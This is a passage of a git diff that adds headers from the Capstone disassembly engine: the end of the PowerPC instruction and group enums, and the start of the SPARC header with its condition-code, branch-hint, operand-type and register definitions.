PPC_INS_FCFIDUS, + PPC_INS_FCMPU, + PPC_INS_FCPSGN, + PPC_INS_FCTID, + PPC_INS_FCTIDUZ, + PPC_INS_FCTIDZ, + PPC_INS_FCTIW, + PPC_INS_FCTIWUZ, + PPC_INS_FCTIWZ, + PPC_INS_FDIV, + PPC_INS_FDIVS, + PPC_INS_FMADD, + PPC_INS_FMADDS, + PPC_INS_FMR, + PPC_INS_FMSUB, + PPC_INS_FMSUBS, + PPC_INS_FMUL, + PPC_INS_FMULS, + PPC_INS_FNABS, + PPC_INS_FNEG, + 
PPC_INS_FNMADD, + PPC_INS_FNMADDS, + PPC_INS_FNMSUB, + PPC_INS_FNMSUBS, + PPC_INS_FRE, + PPC_INS_FRES, + PPC_INS_FRIM, + PPC_INS_FRIN, + PPC_INS_FRIP, + PPC_INS_FRIZ, + PPC_INS_FRSP, + PPC_INS_FRSQRTE, + PPC_INS_FRSQRTES, + PPC_INS_FSEL, + PPC_INS_FSQRT, + PPC_INS_FSQRTS, + PPC_INS_FSUB, + PPC_INS_FSUBS, + PPC_INS_ICBI, + PPC_INS_ICBT, + PPC_INS_ICCCI, + PPC_INS_ISEL, + PPC_INS_ISYNC, + PPC_INS_LA, + PPC_INS_LBZ, + PPC_INS_LBZCIX, + PPC_INS_LBZU, + PPC_INS_LBZUX, + PPC_INS_LBZX, + PPC_INS_LD, + PPC_INS_LDARX, + PPC_INS_LDBRX, + PPC_INS_LDCIX, + PPC_INS_LDU, + PPC_INS_LDUX, + PPC_INS_LDX, + PPC_INS_LFD, + PPC_INS_LFDU, + PPC_INS_LFDUX, + PPC_INS_LFDX, + PPC_INS_LFIWAX, + PPC_INS_LFIWZX, + PPC_INS_LFS, + PPC_INS_LFSU, + PPC_INS_LFSUX, + PPC_INS_LFSX, + PPC_INS_LHA, + PPC_INS_LHAU, + PPC_INS_LHAUX, + PPC_INS_LHAX, + PPC_INS_LHBRX, + PPC_INS_LHZ, + PPC_INS_LHZCIX, + PPC_INS_LHZU, + PPC_INS_LHZUX, + PPC_INS_LHZX, + PPC_INS_LI, + PPC_INS_LIS, + PPC_INS_LMW, + PPC_INS_LSWI, + PPC_INS_LVEBX, + PPC_INS_LVEHX, + PPC_INS_LVEWX, + PPC_INS_LVSL, + PPC_INS_LVSR, + PPC_INS_LVX, + PPC_INS_LVXL, + PPC_INS_LWA, + PPC_INS_LWARX, + PPC_INS_LWAUX, + PPC_INS_LWAX, + PPC_INS_LWBRX, + PPC_INS_LWZ, + PPC_INS_LWZCIX, + PPC_INS_LWZU, + PPC_INS_LWZUX, + PPC_INS_LWZX, + PPC_INS_LXSDX, + PPC_INS_LXVD2X, + PPC_INS_LXVDSX, + PPC_INS_LXVW4X, + PPC_INS_MBAR, + PPC_INS_MCRF, + PPC_INS_MCRFS, + PPC_INS_MFCR, + PPC_INS_MFCTR, + PPC_INS_MFDCR, + PPC_INS_MFFS, + PPC_INS_MFLR, + PPC_INS_MFMSR, + PPC_INS_MFOCRF, + PPC_INS_MFSPR, + PPC_INS_MFSR, + PPC_INS_MFSRIN, + PPC_INS_MFTB, + PPC_INS_MFVSCR, + PPC_INS_MSYNC, + PPC_INS_MTCRF, + PPC_INS_MTCTR, + PPC_INS_MTDCR, + PPC_INS_MTFSB0, + PPC_INS_MTFSB1, + PPC_INS_MTFSF, + PPC_INS_MTFSFI, + PPC_INS_MTLR, + PPC_INS_MTMSR, + PPC_INS_MTMSRD, + PPC_INS_MTOCRF, + PPC_INS_MTSPR, + PPC_INS_MTSR, + PPC_INS_MTSRIN, + PPC_INS_MTVSCR, + PPC_INS_MULHD, + PPC_INS_MULHDU, + PPC_INS_MULHW, + PPC_INS_MULHWU, + PPC_INS_MULLD, + PPC_INS_MULLI, + PPC_INS_MULLW, + PPC_INS_NAND, + 
PPC_INS_NEG, + PPC_INS_NOP, + PPC_INS_ORI, + PPC_INS_NOR, + PPC_INS_OR, + PPC_INS_ORC, + PPC_INS_ORIS, + PPC_INS_POPCNTD, + PPC_INS_POPCNTW, + PPC_INS_QVALIGNI, + PPC_INS_QVESPLATI, + PPC_INS_QVFABS, + PPC_INS_QVFADD, + PPC_INS_QVFADDS, + PPC_INS_QVFCFID, + PPC_INS_QVFCFIDS, + PPC_INS_QVFCFIDU, + PPC_INS_QVFCFIDUS, + PPC_INS_QVFCMPEQ, + PPC_INS_QVFCMPGT, + PPC_INS_QVFCMPLT, + PPC_INS_QVFCPSGN, + PPC_INS_QVFCTID, + PPC_INS_QVFCTIDU, + PPC_INS_QVFCTIDUZ, + PPC_INS_QVFCTIDZ, + PPC_INS_QVFCTIW, + PPC_INS_QVFCTIWU, + PPC_INS_QVFCTIWUZ, + PPC_INS_QVFCTIWZ, + PPC_INS_QVFLOGICAL, + PPC_INS_QVFMADD, + PPC_INS_QVFMADDS, + PPC_INS_QVFMR, + PPC_INS_QVFMSUB, + PPC_INS_QVFMSUBS, + PPC_INS_QVFMUL, + PPC_INS_QVFMULS, + PPC_INS_QVFNABS, + PPC_INS_QVFNEG, + PPC_INS_QVFNMADD, + PPC_INS_QVFNMADDS, + PPC_INS_QVFNMSUB, + PPC_INS_QVFNMSUBS, + PPC_INS_QVFPERM, + PPC_INS_QVFRE, + PPC_INS_QVFRES, + PPC_INS_QVFRIM, + PPC_INS_QVFRIN, + PPC_INS_QVFRIP, + PPC_INS_QVFRIZ, + PPC_INS_QVFRSP, + PPC_INS_QVFRSQRTE, + PPC_INS_QVFRSQRTES, + PPC_INS_QVFSEL, + PPC_INS_QVFSUB, + PPC_INS_QVFSUBS, + PPC_INS_QVFTSTNAN, + PPC_INS_QVFXMADD, + PPC_INS_QVFXMADDS, + PPC_INS_QVFXMUL, + PPC_INS_QVFXMULS, + PPC_INS_QVFXXCPNMADD, + PPC_INS_QVFXXCPNMADDS, + PPC_INS_QVFXXMADD, + PPC_INS_QVFXXMADDS, + PPC_INS_QVFXXNPMADD, + PPC_INS_QVFXXNPMADDS, + PPC_INS_QVGPCI, + PPC_INS_QVLFCDUX, + PPC_INS_QVLFCDUXA, + PPC_INS_QVLFCDX, + PPC_INS_QVLFCDXA, + PPC_INS_QVLFCSUX, + PPC_INS_QVLFCSUXA, + PPC_INS_QVLFCSX, + PPC_INS_QVLFCSXA, + PPC_INS_QVLFDUX, + PPC_INS_QVLFDUXA, + PPC_INS_QVLFDX, + PPC_INS_QVLFDXA, + PPC_INS_QVLFIWAX, + PPC_INS_QVLFIWAXA, + PPC_INS_QVLFIWZX, + PPC_INS_QVLFIWZXA, + PPC_INS_QVLFSUX, + PPC_INS_QVLFSUXA, + PPC_INS_QVLFSX, + PPC_INS_QVLFSXA, + PPC_INS_QVLPCLDX, + PPC_INS_QVLPCLSX, + PPC_INS_QVLPCRDX, + PPC_INS_QVLPCRSX, + PPC_INS_QVSTFCDUX, + PPC_INS_QVSTFCDUXA, + PPC_INS_QVSTFCDUXI, + PPC_INS_QVSTFCDUXIA, + PPC_INS_QVSTFCDX, + PPC_INS_QVSTFCDXA, + PPC_INS_QVSTFCDXI, + PPC_INS_QVSTFCDXIA, + PPC_INS_QVSTFCSUX, + 
PPC_INS_QVSTFCSUXA, + PPC_INS_QVSTFCSUXI, + PPC_INS_QVSTFCSUXIA, + PPC_INS_QVSTFCSX, + PPC_INS_QVSTFCSXA, + PPC_INS_QVSTFCSXI, + PPC_INS_QVSTFCSXIA, + PPC_INS_QVSTFDUX, + PPC_INS_QVSTFDUXA, + PPC_INS_QVSTFDUXI, + PPC_INS_QVSTFDUXIA, + PPC_INS_QVSTFDX, + PPC_INS_QVSTFDXA, + PPC_INS_QVSTFDXI, + PPC_INS_QVSTFDXIA, + PPC_INS_QVSTFIWX, + PPC_INS_QVSTFIWXA, + PPC_INS_QVSTFSUX, + PPC_INS_QVSTFSUXA, + PPC_INS_QVSTFSUXI, + PPC_INS_QVSTFSUXIA, + PPC_INS_QVSTFSX, + PPC_INS_QVSTFSXA, + PPC_INS_QVSTFSXI, + PPC_INS_QVSTFSXIA, + PPC_INS_RFCI, + PPC_INS_RFDI, + PPC_INS_RFI, + PPC_INS_RFID, + PPC_INS_RFMCI, + PPC_INS_RLDCL, + PPC_INS_RLDCR, + PPC_INS_RLDIC, + PPC_INS_RLDICL, + PPC_INS_RLDICR, + PPC_INS_RLDIMI, + PPC_INS_RLWIMI, + PPC_INS_RLWINM, + PPC_INS_RLWNM, + PPC_INS_SC, + PPC_INS_SLBIA, + PPC_INS_SLBIE, + PPC_INS_SLBMFEE, + PPC_INS_SLBMTE, + PPC_INS_SLD, + PPC_INS_SLW, + PPC_INS_SRAD, + PPC_INS_SRADI, + PPC_INS_SRAW, + PPC_INS_SRAWI, + PPC_INS_SRD, + PPC_INS_SRW, + PPC_INS_STB, + PPC_INS_STBCIX, + PPC_INS_STBU, + PPC_INS_STBUX, + PPC_INS_STBX, + PPC_INS_STD, + PPC_INS_STDBRX, + PPC_INS_STDCIX, + PPC_INS_STDCX, + PPC_INS_STDU, + PPC_INS_STDUX, + PPC_INS_STDX, + PPC_INS_STFD, + PPC_INS_STFDU, + PPC_INS_STFDUX, + PPC_INS_STFDX, + PPC_INS_STFIWX, + PPC_INS_STFS, + PPC_INS_STFSU, + PPC_INS_STFSUX, + PPC_INS_STFSX, + PPC_INS_STH, + PPC_INS_STHBRX, + PPC_INS_STHCIX, + PPC_INS_STHU, + PPC_INS_STHUX, + PPC_INS_STHX, + PPC_INS_STMW, + PPC_INS_STSWI, + PPC_INS_STVEBX, + PPC_INS_STVEHX, + PPC_INS_STVEWX, + PPC_INS_STVX, + PPC_INS_STVXL, + PPC_INS_STW, + PPC_INS_STWBRX, + PPC_INS_STWCIX, + PPC_INS_STWCX, + PPC_INS_STWU, + PPC_INS_STWUX, + PPC_INS_STWX, + PPC_INS_STXSDX, + PPC_INS_STXVD2X, + PPC_INS_STXVW4X, + PPC_INS_SUBF, + PPC_INS_SUBFC, + PPC_INS_SUBFE, + PPC_INS_SUBFIC, + PPC_INS_SUBFME, + PPC_INS_SUBFZE, + PPC_INS_SYNC, + PPC_INS_TD, + PPC_INS_TDI, + PPC_INS_TLBIA, + PPC_INS_TLBIE, + PPC_INS_TLBIEL, + PPC_INS_TLBIVAX, + PPC_INS_TLBLD, + PPC_INS_TLBLI, + PPC_INS_TLBRE, + 
PPC_INS_TLBSX, + PPC_INS_TLBSYNC, + PPC_INS_TLBWE, + PPC_INS_TRAP, + PPC_INS_TW, + PPC_INS_TWI, + PPC_INS_VADDCUW, + PPC_INS_VADDFP, + PPC_INS_VADDSBS, + PPC_INS_VADDSHS, + PPC_INS_VADDSWS, + PPC_INS_VADDUBM, + PPC_INS_VADDUBS, + PPC_INS_VADDUDM, + PPC_INS_VADDUHM, + PPC_INS_VADDUHS, + PPC_INS_VADDUWM, + PPC_INS_VADDUWS, + PPC_INS_VAND, + PPC_INS_VANDC, + PPC_INS_VAVGSB, + PPC_INS_VAVGSH, + PPC_INS_VAVGSW, + PPC_INS_VAVGUB, + PPC_INS_VAVGUH, + PPC_INS_VAVGUW, + PPC_INS_VCFSX, + PPC_INS_VCFUX, + PPC_INS_VCLZB, + PPC_INS_VCLZD, + PPC_INS_VCLZH, + PPC_INS_VCLZW, + PPC_INS_VCMPBFP, + PPC_INS_VCMPEQFP, + PPC_INS_VCMPEQUB, + PPC_INS_VCMPEQUD, + PPC_INS_VCMPEQUH, + PPC_INS_VCMPEQUW, + PPC_INS_VCMPGEFP, + PPC_INS_VCMPGTFP, + PPC_INS_VCMPGTSB, + PPC_INS_VCMPGTSD, + PPC_INS_VCMPGTSH, + PPC_INS_VCMPGTSW, + PPC_INS_VCMPGTUB, + PPC_INS_VCMPGTUD, + PPC_INS_VCMPGTUH, + PPC_INS_VCMPGTUW, + PPC_INS_VCTSXS, + PPC_INS_VCTUXS, + PPC_INS_VEQV, + PPC_INS_VEXPTEFP, + PPC_INS_VLOGEFP, + PPC_INS_VMADDFP, + PPC_INS_VMAXFP, + PPC_INS_VMAXSB, + PPC_INS_VMAXSD, + PPC_INS_VMAXSH, + PPC_INS_VMAXSW, + PPC_INS_VMAXUB, + PPC_INS_VMAXUD, + PPC_INS_VMAXUH, + PPC_INS_VMAXUW, + PPC_INS_VMHADDSHS, + PPC_INS_VMHRADDSHS, + PPC_INS_VMINUD, + PPC_INS_VMINFP, + PPC_INS_VMINSB, + PPC_INS_VMINSD, + PPC_INS_VMINSH, + PPC_INS_VMINSW, + PPC_INS_VMINUB, + PPC_INS_VMINUH, + PPC_INS_VMINUW, + PPC_INS_VMLADDUHM, + PPC_INS_VMRGHB, + PPC_INS_VMRGHH, + PPC_INS_VMRGHW, + PPC_INS_VMRGLB, + PPC_INS_VMRGLH, + PPC_INS_VMRGLW, + PPC_INS_VMSUMMBM, + PPC_INS_VMSUMSHM, + PPC_INS_VMSUMSHS, + PPC_INS_VMSUMUBM, + PPC_INS_VMSUMUHM, + PPC_INS_VMSUMUHS, + PPC_INS_VMULESB, + PPC_INS_VMULESH, + PPC_INS_VMULESW, + PPC_INS_VMULEUB, + PPC_INS_VMULEUH, + PPC_INS_VMULEUW, + PPC_INS_VMULOSB, + PPC_INS_VMULOSH, + PPC_INS_VMULOSW, + PPC_INS_VMULOUB, + PPC_INS_VMULOUH, + PPC_INS_VMULOUW, + PPC_INS_VMULUWM, + PPC_INS_VNAND, + PPC_INS_VNMSUBFP, + PPC_INS_VNOR, + PPC_INS_VOR, + PPC_INS_VORC, + PPC_INS_VPERM, + PPC_INS_VPKPX, + PPC_INS_VPKSHSS, + 
PPC_INS_VPKSHUS, + PPC_INS_VPKSWSS, + PPC_INS_VPKSWUS, + PPC_INS_VPKUHUM, + PPC_INS_VPKUHUS, + PPC_INS_VPKUWUM, + PPC_INS_VPKUWUS, + PPC_INS_VPOPCNTB, + PPC_INS_VPOPCNTD, + PPC_INS_VPOPCNTH, + PPC_INS_VPOPCNTW, + PPC_INS_VREFP, + PPC_INS_VRFIM, + PPC_INS_VRFIN, + PPC_INS_VRFIP, + PPC_INS_VRFIZ, + PPC_INS_VRLB, + PPC_INS_VRLD, + PPC_INS_VRLH, + PPC_INS_VRLW, + PPC_INS_VRSQRTEFP, + PPC_INS_VSEL, + PPC_INS_VSL, + PPC_INS_VSLB, + PPC_INS_VSLD, + PPC_INS_VSLDOI, + PPC_INS_VSLH, + PPC_INS_VSLO, + PPC_INS_VSLW, + PPC_INS_VSPLTB, + PPC_INS_VSPLTH, + PPC_INS_VSPLTISB, + PPC_INS_VSPLTISH, + PPC_INS_VSPLTISW, + PPC_INS_VSPLTW, + PPC_INS_VSR, + PPC_INS_VSRAB, + PPC_INS_VSRAD, + PPC_INS_VSRAH, + PPC_INS_VSRAW, + PPC_INS_VSRB, + PPC_INS_VSRD, + PPC_INS_VSRH, + PPC_INS_VSRO, + PPC_INS_VSRW, + PPC_INS_VSUBCUW, + PPC_INS_VSUBFP, + PPC_INS_VSUBSBS, + PPC_INS_VSUBSHS, + PPC_INS_VSUBSWS, + PPC_INS_VSUBUBM, + PPC_INS_VSUBUBS, + PPC_INS_VSUBUDM, + PPC_INS_VSUBUHM, + PPC_INS_VSUBUHS, + PPC_INS_VSUBUWM, + PPC_INS_VSUBUWS, + PPC_INS_VSUM2SWS, + PPC_INS_VSUM4SBS, + PPC_INS_VSUM4SHS, + PPC_INS_VSUM4UBS, + PPC_INS_VSUMSWS, + PPC_INS_VUPKHPX, + PPC_INS_VUPKHSB, + PPC_INS_VUPKHSH, + PPC_INS_VUPKLPX, + PPC_INS_VUPKLSB, + PPC_INS_VUPKLSH, + PPC_INS_VXOR, + PPC_INS_WAIT, + PPC_INS_WRTEE, + PPC_INS_WRTEEI, + PPC_INS_XOR, + PPC_INS_XORI, + PPC_INS_XORIS, + PPC_INS_XSABSDP, + PPC_INS_XSADDDP, + PPC_INS_XSCMPODP, + PPC_INS_XSCMPUDP, + PPC_INS_XSCPSGNDP, + PPC_INS_XSCVDPSP, + PPC_INS_XSCVDPSXDS, + PPC_INS_XSCVDPSXWS, + PPC_INS_XSCVDPUXDS, + PPC_INS_XSCVDPUXWS, + PPC_INS_XSCVSPDP, + PPC_INS_XSCVSXDDP, + PPC_INS_XSCVUXDDP, + PPC_INS_XSDIVDP, + PPC_INS_XSMADDADP, + PPC_INS_XSMADDMDP, + PPC_INS_XSMAXDP, + PPC_INS_XSMINDP, + PPC_INS_XSMSUBADP, + PPC_INS_XSMSUBMDP, + PPC_INS_XSMULDP, + PPC_INS_XSNABSDP, + PPC_INS_XSNEGDP, + PPC_INS_XSNMADDADP, + PPC_INS_XSNMADDMDP, + PPC_INS_XSNMSUBADP, + PPC_INS_XSNMSUBMDP, + PPC_INS_XSRDPI, + PPC_INS_XSRDPIC, + PPC_INS_XSRDPIM, + PPC_INS_XSRDPIP, + PPC_INS_XSRDPIZ, + 
PPC_INS_XSREDP, + PPC_INS_XSRSQRTEDP, + PPC_INS_XSSQRTDP, + PPC_INS_XSSUBDP, + PPC_INS_XSTDIVDP, + PPC_INS_XSTSQRTDP, + PPC_INS_XVABSDP, + PPC_INS_XVABSSP, + PPC_INS_XVADDDP, + PPC_INS_XVADDSP, + PPC_INS_XVCMPEQDP, + PPC_INS_XVCMPEQSP, + PPC_INS_XVCMPGEDP, + PPC_INS_XVCMPGESP, + PPC_INS_XVCMPGTDP, + PPC_INS_XVCMPGTSP, + PPC_INS_XVCPSGNDP, + PPC_INS_XVCPSGNSP, + PPC_INS_XVCVDPSP, + PPC_INS_XVCVDPSXDS, + PPC_INS_XVCVDPSXWS, + PPC_INS_XVCVDPUXDS, + PPC_INS_XVCVDPUXWS, + PPC_INS_XVCVSPDP, + PPC_INS_XVCVSPSXDS, + PPC_INS_XVCVSPSXWS, + PPC_INS_XVCVSPUXDS, + PPC_INS_XVCVSPUXWS, + PPC_INS_XVCVSXDDP, + PPC_INS_XVCVSXDSP, + PPC_INS_XVCVSXWDP, + PPC_INS_XVCVSXWSP, + PPC_INS_XVCVUXDDP, + PPC_INS_XVCVUXDSP, + PPC_INS_XVCVUXWDP, + PPC_INS_XVCVUXWSP, + PPC_INS_XVDIVDP, + PPC_INS_XVDIVSP, + PPC_INS_XVMADDADP, + PPC_INS_XVMADDASP, + PPC_INS_XVMADDMDP, + PPC_INS_XVMADDMSP, + PPC_INS_XVMAXDP, + PPC_INS_XVMAXSP, + PPC_INS_XVMINDP, + PPC_INS_XVMINSP, + PPC_INS_XVMSUBADP, + PPC_INS_XVMSUBASP, + PPC_INS_XVMSUBMDP, + PPC_INS_XVMSUBMSP, + PPC_INS_XVMULDP, + PPC_INS_XVMULSP, + PPC_INS_XVNABSDP, + PPC_INS_XVNABSSP, + PPC_INS_XVNEGDP, + PPC_INS_XVNEGSP, + PPC_INS_XVNMADDADP, + PPC_INS_XVNMADDASP, + PPC_INS_XVNMADDMDP, + PPC_INS_XVNMADDMSP, + PPC_INS_XVNMSUBADP, + PPC_INS_XVNMSUBASP, + PPC_INS_XVNMSUBMDP, + PPC_INS_XVNMSUBMSP, + PPC_INS_XVRDPI, + PPC_INS_XVRDPIC, + PPC_INS_XVRDPIM, + PPC_INS_XVRDPIP, + PPC_INS_XVRDPIZ, + PPC_INS_XVREDP, + PPC_INS_XVRESP, + PPC_INS_XVRSPI, + PPC_INS_XVRSPIC, + PPC_INS_XVRSPIM, + PPC_INS_XVRSPIP, + PPC_INS_XVRSPIZ, + PPC_INS_XVRSQRTEDP, + PPC_INS_XVRSQRTESP, + PPC_INS_XVSQRTDP, + PPC_INS_XVSQRTSP, + PPC_INS_XVSUBDP, + PPC_INS_XVSUBSP, + PPC_INS_XVTDIVDP, + PPC_INS_XVTDIVSP, + PPC_INS_XVTSQRTDP, + PPC_INS_XVTSQRTSP, + PPC_INS_XXLAND, + PPC_INS_XXLANDC, + PPC_INS_XXLEQV, + PPC_INS_XXLNAND, + PPC_INS_XXLNOR, + PPC_INS_XXLOR, + PPC_INS_XXLORC, + PPC_INS_XXLXOR, + PPC_INS_XXMRGHW, + PPC_INS_XXMRGLW, + PPC_INS_XXPERMDI, + PPC_INS_XXSEL, + PPC_INS_XXSLDWI, + 
PPC_INS_XXSPLTW, + PPC_INS_BCA, + PPC_INS_BCLA, + + // extra & alias instructions + PPC_INS_SLWI, + PPC_INS_SRWI, + PPC_INS_SLDI, + + PPC_INS_BTA, + PPC_INS_CRSET, + PPC_INS_CRNOT, + PPC_INS_CRMOVE, + PPC_INS_CRCLR, + PPC_INS_MFBR0, + PPC_INS_MFBR1, + PPC_INS_MFBR2, + PPC_INS_MFBR3, + PPC_INS_MFBR4, + PPC_INS_MFBR5, + PPC_INS_MFBR6, + PPC_INS_MFBR7, + PPC_INS_MFXER, + PPC_INS_MFRTCU, + PPC_INS_MFRTCL, + PPC_INS_MFDSCR, + PPC_INS_MFDSISR, + PPC_INS_MFDAR, + PPC_INS_MFSRR2, + PPC_INS_MFSRR3, + PPC_INS_MFCFAR, + PPC_INS_MFAMR, + PPC_INS_MFPID, + PPC_INS_MFTBLO, + PPC_INS_MFTBHI, + PPC_INS_MFDBATU, + PPC_INS_MFDBATL, + PPC_INS_MFIBATU, + PPC_INS_MFIBATL, + PPC_INS_MFDCCR, + PPC_INS_MFICCR, + PPC_INS_MFDEAR, + PPC_INS_MFESR, + PPC_INS_MFSPEFSCR, + PPC_INS_MFTCR, + PPC_INS_MFASR, + PPC_INS_MFPVR, + PPC_INS_MFTBU, + PPC_INS_MTCR, + PPC_INS_MTBR0, + PPC_INS_MTBR1, + PPC_INS_MTBR2, + PPC_INS_MTBR3, + PPC_INS_MTBR4, + PPC_INS_MTBR5, + PPC_INS_MTBR6, + PPC_INS_MTBR7, + PPC_INS_MTXER, + PPC_INS_MTDSCR, + PPC_INS_MTDSISR, + PPC_INS_MTDAR, + PPC_INS_MTSRR2, + PPC_INS_MTSRR3, + PPC_INS_MTCFAR, + PPC_INS_MTAMR, + PPC_INS_MTPID, + PPC_INS_MTTBL, + PPC_INS_MTTBU, + PPC_INS_MTTBLO, + PPC_INS_MTTBHI, + PPC_INS_MTDBATU, + PPC_INS_MTDBATL, + PPC_INS_MTIBATU, + PPC_INS_MTIBATL, + PPC_INS_MTDCCR, + PPC_INS_MTICCR, + PPC_INS_MTDEAR, + PPC_INS_MTESR, + PPC_INS_MTSPEFSCR, + PPC_INS_MTTCR, + PPC_INS_NOT, + PPC_INS_MR, + PPC_INS_ROTLD, + PPC_INS_ROTLDI, + PPC_INS_CLRLDI, + PPC_INS_ROTLWI, + PPC_INS_CLRLWI, + PPC_INS_ROTLW, + PPC_INS_SUB, + PPC_INS_SUBC, + PPC_INS_LWSYNC, + PPC_INS_PTESYNC, + PPC_INS_TDLT, + PPC_INS_TDEQ, + PPC_INS_TDGT, + PPC_INS_TDNE, + PPC_INS_TDLLT, + PPC_INS_TDLGT, + PPC_INS_TDU, + PPC_INS_TDLTI, + PPC_INS_TDEQI, + PPC_INS_TDGTI, + PPC_INS_TDNEI, + PPC_INS_TDLLTI, + PPC_INS_TDLGTI, + PPC_INS_TDUI, + PPC_INS_TLBREHI, + PPC_INS_TLBRELO, + PPC_INS_TLBWEHI, + PPC_INS_TLBWELO, + PPC_INS_TWLT, + PPC_INS_TWEQ, + PPC_INS_TWGT, + PPC_INS_TWNE, + PPC_INS_TWLLT, + PPC_INS_TWLGT, + 
PPC_INS_TWU, + PPC_INS_TWLTI, + PPC_INS_TWEQI, + PPC_INS_TWGTI, + PPC_INS_TWNEI, + PPC_INS_TWLLTI, + PPC_INS_TWLGTI, + PPC_INS_TWUI, + PPC_INS_WAITRSV, + PPC_INS_WAITIMPL, + PPC_INS_XNOP, + PPC_INS_XVMOVDP, + PPC_INS_XVMOVSP, + PPC_INS_XXSPLTD, + PPC_INS_XXMRGHD, + PPC_INS_XXMRGLD, + PPC_INS_XXSWAPD, + PPC_INS_BT, + PPC_INS_BF, + PPC_INS_BDNZT, + PPC_INS_BDNZF, + PPC_INS_BDZF, + PPC_INS_BDZT, + PPC_INS_BFA, + PPC_INS_BDNZTA, + PPC_INS_BDNZFA, + PPC_INS_BDZTA, + PPC_INS_BDZFA, + PPC_INS_BTCTR, + PPC_INS_BFCTR, + PPC_INS_BTCTRL, + PPC_INS_BFCTRL, + PPC_INS_BTL, + PPC_INS_BFL, + PPC_INS_BDNZTL, + PPC_INS_BDNZFL, + PPC_INS_BDZTL, + PPC_INS_BDZFL, + PPC_INS_BTLA, + PPC_INS_BFLA, + PPC_INS_BDNZTLA, + PPC_INS_BDNZFLA, + PPC_INS_BDZTLA, + PPC_INS_BDZFLA, + PPC_INS_BTLR, + PPC_INS_BFLR, + PPC_INS_BDNZTLR, + PPC_INS_BDZTLR, + PPC_INS_BDZFLR, + PPC_INS_BTLRL, + PPC_INS_BFLRL, + PPC_INS_BDNZTLRL, + PPC_INS_BDNZFLRL, + PPC_INS_BDZTLRL, + PPC_INS_BDZFLRL, + + // QPX + PPC_INS_QVFAND, + PPC_INS_QVFCLR, + PPC_INS_QVFANDC, + PPC_INS_QVFCTFB, + PPC_INS_QVFXOR, + PPC_INS_QVFOR, + PPC_INS_QVFNOR, + PPC_INS_QVFEQU, + PPC_INS_QVFNOT, + PPC_INS_QVFORC, + PPC_INS_QVFNAND, + PPC_INS_QVFSET, + + PPC_INS_ENDING, // <-- mark the end of the list of instructions +} ppc_insn; + +/// Group of PPC instructions +typedef enum ppc_insn_group { + PPC_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + PPC_GRP_JUMP, ///< = CS_GRP_JUMP + + // Architecture-specific groups + PPC_GRP_ALTIVEC = 128, + PPC_GRP_MODE32, + PPC_GRP_MODE64, + PPC_GRP_BOOKE, + PPC_GRP_NOTBOOKE, + PPC_GRP_SPE, + PPC_GRP_VSX, + PPC_GRP_E500, + PPC_GRP_PPC4XX, + PPC_GRP_PPC6XX, + PPC_GRP_ICBT, + PPC_GRP_P8ALTIVEC, + PPC_GRP_P8VECTOR, + PPC_GRP_QPX, + + PPC_GRP_ENDING, // <-- mark the end of the list of groups +} ppc_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/sparc.h 
b/ai_anti_malware/capstone/include/capstone/sparc.h new file mode 100644 index 0000000..e33d173 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/sparc.h @@ -0,0 +1,520 @@ +#ifndef CAPSTONE_SPARC_H +#define CAPSTONE_SPARC_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2014-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// GCC SPARC toolchain has a default macro called "sparc" which breaks +// compilation +#undef sparc + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +/// Enums corresponding to Sparc condition codes, both icc's and fcc's. +typedef enum sparc_cc { + SPARC_CC_INVALID = 0, ///< invalid CC (default) + // Integer condition codes + SPARC_CC_ICC_A = 8+256, ///< Always + SPARC_CC_ICC_N = 0+256, ///< Never + SPARC_CC_ICC_NE = 9+256, ///< Not Equal + SPARC_CC_ICC_E = 1+256, ///< Equal + SPARC_CC_ICC_G = 10+256, ///< Greater + SPARC_CC_ICC_LE = 2+256, ///< Less or Equal + SPARC_CC_ICC_GE = 11+256, ///< Greater or Equal + SPARC_CC_ICC_L = 3+256, ///< Less + SPARC_CC_ICC_GU = 12+256, ///< Greater Unsigned + SPARC_CC_ICC_LEU = 4+256, ///< Less or Equal Unsigned + SPARC_CC_ICC_CC = 13+256, ///< Carry Clear/Great or Equal Unsigned + SPARC_CC_ICC_CS = 5+256, ///< Carry Set/Less Unsigned + SPARC_CC_ICC_POS = 14+256, ///< Positive + SPARC_CC_ICC_NEG = 6+256, ///< Negative + SPARC_CC_ICC_VC = 15+256, ///< Overflow Clear + SPARC_CC_ICC_VS = 7+256, ///< Overflow Set + + // Floating condition codes + SPARC_CC_FCC_A = 8+16+256, ///< Always + SPARC_CC_FCC_N = 0+16+256, ///< Never + SPARC_CC_FCC_U = 7+16+256, ///< Unordered + SPARC_CC_FCC_G = 6+16+256, ///< Greater + SPARC_CC_FCC_UG = 5+16+256, ///< Unordered or Greater + SPARC_CC_FCC_L = 4+16+256, ///< Less + SPARC_CC_FCC_UL = 3+16+256, ///< Unordered or Less + SPARC_CC_FCC_LG = 2+16+256, ///< Less or Greater + SPARC_CC_FCC_NE = 1+16+256, ///< Not Equal + SPARC_CC_FCC_E = 9+16+256, ///< Equal + SPARC_CC_FCC_UE = 10+16+256, ///< Unordered or Equal + 
SPARC_CC_FCC_GE = 11+16+256, ///< Greater or Equal + SPARC_CC_FCC_UGE = 12+16+256, ///< Unordered or Greater or Equal + SPARC_CC_FCC_LE = 13+16+256, ///< Less or Equal + SPARC_CC_FCC_ULE = 14+16+256, ///< Unordered or Less or Equal + SPARC_CC_FCC_O = 15+16+256, ///< Ordered +} sparc_cc; + +/// Branch hint +typedef enum sparc_hint { + SPARC_HINT_INVALID = 0, ///< no hint + SPARC_HINT_A = 1 << 0, ///< annul delay slot instruction + SPARC_HINT_PT = 1 << 1, ///< branch taken + SPARC_HINT_PN = 1 << 2, ///< branch NOT taken +} sparc_hint; + +/// Operand type for instruction's operands +typedef enum sparc_op_type { + SPARC_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + SPARC_OP_REG, ///< = CS_OP_REG (Register operand). + SPARC_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + SPARC_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} sparc_op_type; + +/// SPARC registers +typedef enum sparc_reg { + SPARC_REG_INVALID = 0, + + SPARC_REG_F0, + SPARC_REG_F1, + SPARC_REG_F2, + SPARC_REG_F3, + SPARC_REG_F4, + 